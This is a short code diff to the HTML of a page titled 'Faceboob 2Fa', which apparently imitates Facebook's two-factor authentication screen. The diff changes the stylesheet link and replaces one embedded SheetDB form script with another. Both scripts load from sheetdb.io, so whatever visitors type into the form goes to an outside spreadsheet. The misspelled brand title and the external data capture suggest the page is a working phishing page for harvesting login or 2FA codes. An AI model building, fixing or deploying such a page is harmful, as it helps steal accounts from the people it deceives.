--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Faceboob 2Fa</title>
-  <link rel="stylesheet" href="style.css" />
+  <link rel="stylesheet" href="styles.css" />
 </head>
 <body>
 
@@ -19,9 +19,6 @@
 
     <!-- SheetDB embedded form -->
     <div class="form-wrapper">
-      <script src="https://sheetdb.io/api/v1/j9lyxr2iq95sh"></script>
+        <script src="https://sheetdb.io/s/f/isbrr54xxg6fa.js"></script>
     </div>
   </div>
-
-</body>
-</html>
